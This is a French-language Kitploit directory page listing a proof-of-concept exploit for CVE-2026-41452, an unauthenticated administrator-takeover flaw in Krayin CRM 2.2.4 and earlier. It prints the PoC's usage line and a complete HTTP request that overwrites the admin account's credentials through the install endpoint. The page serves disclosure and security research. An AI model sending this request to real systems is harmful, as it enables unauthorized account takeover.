Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2026-41452-poc — Proof-of-concept d'exploit pour CVE-2026-41452, un contournement d'authentification critique dans Krayin CRM <= 2.2.4 permettant une prise de contrôle de compte administrateur sans authentification via un contournement de middleware. | Kitploit
Outils/GitHubGitHub/o-sec/cve-2026-41452-poc
Analyse des VulnérabilitésExploitationExploitation d'Applications WebSécurité WebTests d'IntrusionAuthentification
GitHubo-sec/cve-2026-41452-poc

CVE-2026-41452-poc

Proof-of-concept d'exploit pour CVE-2026-41452, un contournement d'authentification critique dans Krayin CRM <= 2.2.4 permettant une prise de contrôle de compte administrateur sans authentification via un contournement de middleware.

Voir le dépôt
il y a 13h 59mPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2026-41452 : Prise de contrôle du compte administrateur de Krayin CRM via contournement de middleware

CVSS v3.1: 9.8 Critical Target: Krayin CRM <= 2.2.4 License: MIT

Une preuve de concept (PoC) démontrant une vulnérabilité critique d'authentification manquante (CVE-2026-41452) affectant Krayin CRM version 2.2.4 et antérieures.

Cette faille permet à des attaquants distants non authentifiés de contourner la logique du middleware d'installation de l'application (CanInstall) en injectant des en-têtes HTTP spécifiques, entraînant un écrasement complet de la configuration du compte administrateur principal.

[!WARNING]
Avertissement : Ce dépôt et les informations qu'il contient sont fournis strictement à des fins éducatives, de recherche en sécurité et d'audit défensif autorisé. Les tests ou l'exploitation non autorisés de systèmes informatiques sont strictement illégaux. L'auteur décline toute responsabilité en cas de mauvaise utilisation de ce matériel.


Aperçu de la vulnérabilité

  • ID CVE : CVE-2026-41452

  • Type de vulnérabilité : Authentification manquante / Contournement de middleware

  • Gravité : Critique (CVSS 9.8)

  • Logiciel affecté : Krayin CRM <= 2.2.4

  • Version corrigée : Krayin CRM >= 2.2.5

Description technique

La vulnérabilité réside dans le middleware de configuration de l'application. Un attaquant non authentifié peut ajouter un en-tête X-Requested-With: XMLHttpRequest à une charge utile conçue pour cibler le point de terminaison /install/api/admin-config-setup. Cela supprime la vérification de redirection attendue au sein du middleware CanInstall, exposant une opération de base de données updateOrInsert non authentifiée qui cible l'ID codé en dur (1) de l'administrateur système principal.


Preuve de concept (PoC)

Utilisation

Exécutez le script contre une instance cible que vous êtes autorisé à tester :

root@kitploit:~
./poc.sh <TARGET-URL> <USERNAME> <EMAIL> <PASSWORD>

Exemple de requête HTTP

En interne, le contournement se déclenche via la structure de transaction HTTP suivante :

root@kitploit:~
POST /install/api/admin-config-setup HTTP/1.1
Host: target-crm.local
X-Requested-With: XMLHttpRequest
Content-Type: application/x-www-form-urlencoded

name=test1&[email protected]&password=Password123

Références

  • nist cve-2026-41452 detail
Télécharger l’outil